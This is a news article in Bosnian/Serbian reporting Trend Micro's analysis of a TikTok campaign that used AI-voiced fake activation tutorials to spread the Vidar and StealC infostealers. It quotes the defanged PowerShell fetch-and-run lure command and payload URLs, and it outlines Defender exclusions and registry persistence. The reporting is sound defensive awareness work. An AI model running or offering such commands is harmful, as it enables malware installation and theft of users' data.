Proširena upozorenja o opasnim TikTok video snimcima koji promovišu piratizovane aplikacije su se pojavila, skrećući pažnju na nove metode kojima se sajberkriminalci služe. Ovi video snimci, koristeći moć platforme TikTok i njene algoritme za dosezanje široke publike, služe kao sredstvo za distribuciju opasnog malvera koji krade informacije.
Uočena je sofisticirana kampanja socijalnog inženjeringa koja koristi video snimke generisane umjetnom inteligencijom. Cilj ovih obmanjujućih sadržaja jeste navođenje korisnika na preuzimanje malvera koji se predstavlja kao tutorijali za aktiviranje softvera. Umjesto da pomognu u aktiviranju legitimnih aplikacija kao što su Windows OS, Microsoft Office, CapCut ili Spotify, ovi video snimci zapravo isporučuju poznate “infostelers” malvere, poput Vidar i StealC, nesuđenim žrtvama.
Ova kampanja predstavlja značajan pomak u strategijama distribucije malvera. Odbacujući tradicionalne metode isporuke putem web stranica ili elektronskih pisama, napadači sada iskorištavaju povjerenje i angažman prisutan na društvenim mrežama. Sva elementi socijalnog inženjeringa ugrađeni su direktno u video sadržaj, što značajno otežava detekciju od strane sigurnosnih rješenja.
Kriminalci maksimalno koriste viralni karakter TikToka. Jedan od takvih zlonamjernih video snimaka zabilježio je skoro 500.000 pregleda, preko 20.000 lajkova i više od 100 komentara, što jasno ukazuje na zabrinjavajući domet i efikasnost ove operacije.
Analitičari iz kompanije Trend Micro identificirali su više TikTok naloga koji su učestvovali u ovoj operaciji. Iako su ti nalozi, poput @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc i @digitaldreams771, u međuvremenu deaktivirani, stručnjaci su primijetili da su postavljali gotovo identične video snimke bez prikaza lica, koristeći glasove generisane umjetnom inteligencijom. Ovo upućuje na automatizovani proces proizvodnje sadržaja usmjeren na skaliranje napada.
Tehnička složenost napada je očigledna u samoj metodologiji izvršenja. Korisnici su upućivani da otvore PowerShell i izvrše naizgled bezopasan command: iex (irm hxxps://allaivo[.]me/spotify). Ovaj PowerShell skript pokreće višestepeni proces infekcije koji demonstrira napredne tehnike izbjegavanja detekcije.
Lanac infekcije malvera sastoji se od pažljivo osmišljenih koraka čiji je cilj osiguranje uspješnog kompromitovanja sistema uz istovremeno izbjegavanje otkrivanja. Po izvršenju, početni PowerShell skript kreira skrivene direktorijume unutar korisnikovih APPDATA i LOCALAPPDATA foldera. Odmah zatim, ove lokacije se dodaju na listu izuzetaka za Windows Defender, kako bi se spriječilo skeniranje od strane antivirusnog programa.
Nakon toga, skript preuzima glavni teret sa adrese hxxps://amssh[.]co/file.exe, koji sadrži varijante malvera Vidar ili StealC. Mehanizam postojanosti uspostavlja se preuzimanjem dodatnog PowerShell skripta sa adrese hxxps://amssh[.]co/script[.]ps1. Time se kreira unos u registar koji osigurava automatsko izvršavanje malvera prilikom pokretanja sistema.
Posebno je značajno što Vidar koristi inovativnu strategiju komande i kontrole, zloupotrebljavajući legitimne servise kao što su Steam profili i Telegram kanali. Ovi servisi služe kao “Dead Drop Resolvers” za skrivanje stvarnih adresa servera za komandu i kontrolu (C&C), čime se znatno komplikuju napori za detekciju i gašenje botneta.